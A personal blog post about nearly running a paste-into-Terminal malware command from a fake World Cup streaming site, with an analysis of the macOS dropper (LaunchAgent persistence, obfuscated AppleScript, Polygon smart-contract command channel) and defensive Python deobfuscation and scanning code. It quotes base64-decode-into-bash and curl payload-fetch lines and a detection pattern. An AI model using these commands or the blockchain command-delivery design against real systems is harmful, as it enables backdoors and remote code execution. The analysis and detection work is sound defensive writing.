I almost got hacked today. I was looking for a free online stream of the FIFA World Cup 2026, found a shady website, and did exactly what it told me to do. In my defense, kickoff was soon.
How it started
The site claimed to stream the World Cup for free and walked me through four steps:
- Press cmd+space
- Type terminal and press enter
- Press cmd+V to paste (no mention of when anything was copied to my clipboard)
- Press enter
Any rational person would have stopped. I didn't — I was too eager to watch the match to think clearly.
What I pasted
The clipboard held something like:
bash "echo "<some short base64 string>" | base64 -d | bash"
I pasted it and pressed enter. macOS immediately flagged it as malware and blocked it.
No harm was done to my system.
That's when I learned about XProtect — Apple's built-in anti-malware system. It keeps a signature list of known malicious scripts and blocks matches before they run. This one was already in the database, which is the only reason nothing bad happened.
Going down the rabbit hole
By then I had completely forgotten about the World Cup.
I ran history to recover the command. Nothing — the script never executed, so there was nothing to find.
Decoding the base64 manually gave me something like this (the link is fake here, but it's real in the actual script):
curl -fsSL https://example.com/malware.sh
I fetched the script without executing it:
curl -fsSL https://example.com/malware.sh | cat
The output was an osascript command wrapping another large base64 payload.
Claude declined to analyze it, citing security policy. ChatGPT did. Here's what it found.
What the malware does
A multi-stage macOS dropper: AppleScript, persistent LaunchAgent, and the Polygon blockchain as a command-delivery channel.
Stage 1 — Persistence. Creates ~/Library/LaunchAgents/com.ifipbqmfnnywqguz.plist and registers it with launchctl. The plist sets RunAtLoad (runs at login) and KeepAlive (relaunches if killed).
Stage 2 — Obfuscated payload. The LaunchAgent runs echo '<base64>' | base64 -d | osascript. The AppleScript rebuilds strings character by character — (character id 112) & (ASCII character 111) & ... — to evade static analysis.
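Reading an AppleScript written in that style by hand is slow, so here is a small deobfuscator as an added example (my own code, not the dropper or anything from the post). It assumes the only obfuscation is runs of (character id N) / (ASCII character N) joined with &, and it rewrites each run into a plain string literal so the script can be read, never run. The sample script is constructed in the same style and does not come from the real payload.

```python
import re

# One obfuscated character expression as it appears in the dropper's AppleScript,
# e.g. "(character id 112)" or "(ASCII character 111)"; both resolve to a code point.
CHAR_EXPR = re.compile(r"\(\s*(?:character id|ASCII character)\s+(\d+)\s*\)")

# A run of such expressions glued together with AppleScript's "&" concatenation.
CHAR_RUN = re.compile(
    r"\(\s*(?:character id|ASCII character)\s+\d+\s*\)"
    r"(?:\s*&\s*\(\s*(?:character id|ASCII character)\s+\d+\s*\))*"
)


def decode_run(run: str) -> str:
    """Turn one '&'-joined run of character expressions back into plain text."""
    return "".join(chr(int(code)) for code in CHAR_EXPR.findall(run))


def rebuild_strings(script: str) -> str:
    """Replace every obfuscated run with an AppleScript string literal so the
    source reads the way the author actually wrote it (for analysis only)."""
    def to_literal(match):
        text = decode_run(match.group(0))
        escaped = text.replace("\\", "\\\\").replace('"', '\\"')
        return f'"{escaped}"'
    return CHAR_RUN.sub(to_literal, script)


def recovered_strings(script: str) -> list:
    """Only the decoded strings, handy for spotting curl/osascript/URLs quickly."""
    return [decode_run(m.group(0)) for m in CHAR_RUN.finditer(script)]


# Constructed sample in the dropper's style (not the real payload): it rebuilds
# "curl" and "-fsSL" one character at a time; theURL is left as a placeholder.
SAMPLE = (
    "set c to (character id 99) & (ASCII character 117) & "
    "(character id 114) & (character id 108)\n"
    "set f to (character id 45) & (character id 102) & (ASCII character 115) & "
    "(character id 83) & (character id 76)\n"
    'do shell script c & " " & f & " " & theURL'
)

if __name__ == "__main__":
    print(rebuild_strings(SAMPLE))
```

Once the literals are back, the interesting bits (interpreter names, URLs, RPC endpoints) are greppable, which is the whole point of the character-id trick being there in the first place.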
Stage 3 — Blockchain C2. The script hits Polygon RPC endpoints
(polygon.drpc.org, polygon.publicnode.com,
polygon-mainnet.gateway.tatum.io, tenderly.rpc.polygon.community),
trying each in sequence. It sends a JSON-RPC eth_call to a hard-coded smart contract,
extracts the hex result (0x...), decodes it to text, and pipes it into
osascript:
Polygon RPC → eth_call → hex response → decode → osascript → execute
The attacker can change behavior anytime by updating what the contract returns — no traditional C2 server, and the on-disk payload never needs updating.
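To see what such a contract is actually handing out, an analyst only needs the captured JSON-RPC reply, not a live connection. The following is an added example of that decode step (my code, not the dropper's and not from the post); it never contacts an RPC endpoint. It assumes the result is either raw bytes or a Solidity ABI-encoded string, since the write-up does not say which layout the real contract uses, and the sample responses are constructed rather than captured from the real contract.

```python
import json

WORD = 32  # EVM word size in bytes


def hex_to_bytes(h: str) -> bytes:
    return bytes.fromhex(h[2:] if h.startswith(("0x", "0X")) else h)


def decode_eth_call_result(result_hex: str) -> str:
    """Recover the text a contract returned in an eth_call result.

    Handles a Solidity ABI-encoded `string` (word 0 = offset 0x20, word 1 =
    byte length, then data zero-padded to a word boundary) and, as the
    fallback assumption, raw bytes with no ABI framing."""
    raw = hex_to_bytes(result_hex)
    if len(raw) >= 2 * WORD:
        offset = int.from_bytes(raw[:WORD], "big")
        length = int.from_bytes(raw[WORD:2 * WORD], "big")
        if offset == WORD and 2 * WORD + length <= len(raw):
            return raw[2 * WORD:2 * WORD + length].decode("utf-8", "replace")
    return raw.rstrip(b"\x00").decode("utf-8", "replace")


# Substrings that mean "this is a command, not a wallet address or a price".
INTERPRETER_MARKERS = ("osascript", "do shell script", "| bash", "| sh", "curl ", "base64")


def triage_rpc_response(body: str) -> dict:
    """Decode one JSON-RPC reply and flag it if the text looks like a command."""
    resp = json.loads(body)
    if "error" in resp or "result" not in resp:
        return {"decoded": None, "suspicious": False, "markers": [], "error": resp.get("error")}
    text = decode_eth_call_result(resp["result"])
    markers = [m for m in INTERPRETER_MARKERS if m in text]
    return {"decoded": text, "suspicious": bool(markers), "markers": markers, "error": None}


def abi_encode_string(s: str) -> str:
    """Build an ABI `string` return value; used only to construct sample input."""
    data = s.encode()
    padded = data + b"\x00" * (-len(data) % WORD)
    body = WORD.to_bytes(WORD, "big") + len(data).to_bytes(WORD, "big") + padded
    return "0x" + body.hex()


# Constructed sample responses (not captured from the real contract).
SAMPLE_COMMAND_RESPONSE = json.dumps({
    "jsonrpc": "2.0", "id": 1,
    "result": abi_encode_string('do shell script "echo constructed-sample"'),
})
SAMPLE_EMPTY_RESPONSE = json.dumps({"jsonrpc": "2.0", "id": 1, "result": "0x"})

if __name__ == "__main__":
    for sample in (SAMPLE_COMMAND_RESPONSE, SAMPLE_EMPTY_RESPONSE):
        print(triage_rpc_response(sample))
```

The decode is the easy part; the reason this design is nasty for defenders is the lack of a takedown target, so the practical detection is on the endpoint (a LaunchAgent whose process talks to public RPC hosts and then spawns osascript), not on the network.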
Verdict: persistent macOS backdoor with remote code execution, using Polygon RPC as command transport. High severity. The blockchain layer delivers attacker commands, not just wallet reconnaissance.
If you ran this script
Look for these:
ls ~/Library/LaunchAgents/com.ifipbqmfnnywqguz.plist
ls ~/Library/ifipbqmfnnywqguz
launchctl list | grep ifipbqmfnnywqguz
If you find them, do this:
launchctl unload ~/Library/LaunchAgents/com.ifipbqmfnnywqguz.plist
rm ~/Library/LaunchAgents/com.ifipbqmfnnywqguz.plist
Also check for similarly named random directories under ~/Library/.
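Because the label is random, the checks above only catch this exact sample. As an added example (my code, not from the post), here is a scanner that looks at the shape of every LaunchAgent instead: a command line that base64-decodes into an interpreter, RunAtLoad together with KeepAlive, and a label that looks machine-generated. The random-label test is a coarse heuristic of my own and will produce false positives; the two plists at the bottom are constructed for the demo, with the suspicious one reusing the label from this incident.

```python
import os
import plistlib
import re

VOWELS = set("aeiou")
# Command shape called out in the write-up: decode base64, pipe into an interpreter.
DECODE_PIPE = re.compile(
    r"base64\s+(-d|-D|--decode)\b.*\|\s*(osascript|bash|sh|zsh|python3?)\b"
)


def looks_random(label: str) -> bool:
    """Coarse heuristic: a 10+ char label segment containing a run of 5+
    consonants, like com.ifipbqmfnnywqguz. Expect false positives."""
    for seg in label.lower().split("."):
        if len(seg) < 10:
            continue
        run = 0
        for ch in seg:
            run = run + 1 if (ch.isalpha() and ch not in VOWELS) else 0
            if run >= 5:
                return True
    return False


def analyze_plist_bytes(data: bytes, filename: str) -> dict:
    """Score one LaunchAgent plist for the persistence-plus-obfuscation pattern."""
    try:
        plist = plistlib.loads(data)
    except Exception as exc:  # a plist launchd cannot parse is still worth a look
        return {"file": filename, "suspicious": True, "reasons": [f"unparseable: {exc}"]}
    reasons = []
    args = plist.get("ProgramArguments") or []
    cmdline = " ".join(str(a) for a in args) if isinstance(args, list) else str(args)
    if plist.get("Program"):
        cmdline = f"{plist['Program']} {cmdline}"
    decodes = bool(DECODE_PIPE.search(cmdline))
    if decodes:
        reasons.append("decodes base64 and pipes it into an interpreter")
    persistent = bool(plist.get("RunAtLoad")) and bool(plist.get("KeepAlive"))
    if persistent:
        reasons.append("RunAtLoad + KeepAlive (runs at login, relaunches if killed)")
    label = str(plist.get("Label", filename))
    random_label = looks_random(label)
    if random_label:
        reasons.append(f"random-looking label {label!r}")
    # A decode-and-pipe command is enough on its own; persistence alone is
    # normal for legitimate agents, so it only counts with a random label.
    suspicious = decodes or (persistent and random_label)
    return {"file": filename, "suspicious": suspicious, "reasons": reasons}


def scan_launch_agents(directory: str) -> list:
    """Return the findings for every suspicious .plist in a directory."""
    findings = []
    if not os.path.isdir(directory):
        return findings
    for name in sorted(os.listdir(directory)):
        if not name.endswith(".plist"):
            continue
        with open(os.path.join(directory, name), "rb") as fh:
            result = analyze_plist_bytes(fh.read(), name)
        if result["suspicious"]:
            findings.append(result)
    return findings


# Constructed samples. The decoded payload here is just the text "ABC".
SUSPICIOUS_PLIST = plistlib.dumps({
    "Label": "com.ifipbqmfnnywqguz",
    "ProgramArguments": ["/bin/sh", "-c", "echo 'QUJD' | base64 -d | osascript"],
    "RunAtLoad": True,
    "KeepAlive": True,
})
BENIGN_PLIST = plistlib.dumps({
    "Label": "com.example.updater",
    "ProgramArguments": ["/usr/local/bin/updater", "--check"],
    "RunAtLoad": True,
    "KeepAlive": {"SuccessfulExit": False},
})

if __name__ == "__main__":
    for finding in scan_launch_agents(os.path.expanduser("~/Library/LaunchAgents")):
        print(finding["file"], "->", "; ".join(finding["reasons"]))
```

Run it as is and it walks ~/Library/LaunchAgents; anything it prints deserves the launchctl unload and rm treatment above, plus a look for the matching directory under ~/Library/.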
What I took away
Simple social engineering — urgency plus a plausible streaming site — almost worked on someone who knows what a terminal is.
- Don't paste commands into Terminal because a website told you to.
- base64 -d | bash is almost never something a legitimate site needs you to run.
- XProtect helped, but it only covers known signatures. New variants can slip through.
Glad the script was blocked, glad I understood what it would have done, and glad I can share this from an uncompromised laptop. Shoutout to Apple for protecting me from myself, and to ChatGPT for analyzing the script.
Now I'm going to watch the World Cup the legal way.
Until next time!